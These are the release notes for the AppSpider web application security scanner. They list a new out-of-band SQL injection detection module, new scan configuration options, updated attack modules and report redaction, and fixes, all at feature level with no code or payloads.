New
- Out-of-Band SQL Injection module. We added a new Out-of-Band SQL Injection module that checks the application for SQLi vulnerabilities that can be detected by monitoring external DNS and HTTP network interactions.
- Config options. We added three new configuration options:
LimitToOneBrowser
, to limit the engine to only use one browser instance during scans.DenylistAllForms
, to prevent the engine from populating or attacking any type of form on a site.Max404FindingsPerModule
, to enable customers to limit the number of vulnerabilities found against 404 pages.
Improved
- Remote Code Execution module. We updated the Remote Code Execution module severity from medium to high.
- Selenium ChromeDriver. The installed version of Selenium ChromeDriver is now 100.0.4896.60.
- Reflected XSS attack module. We improved the Reflected Cross-site Scripting (XSS) simple attack module to catch a previously unreported vulnerability.
- AppSpider report. AppSpider reports now show redacted versions of any known credit cards, telephone numbers, and all other sensitive information.
- Expression Language Injection attack. We added a new Expression Language Injection attack.
- X-Content-Type-Options attack. We updated the X-Content-Type-Options attack to only run against HTML, XML, and JSON types.
- Attack description. We updated the attack description for the Content Security Policy.
Fixed
- Proxy exceptions are now being honored.
- Macro recordings can now be saved from the Pro UI.
- The OpenAPI content type
application/form
is no longer incorrect. - The engine now correctly parses Swagger documents and no longer inputs null values.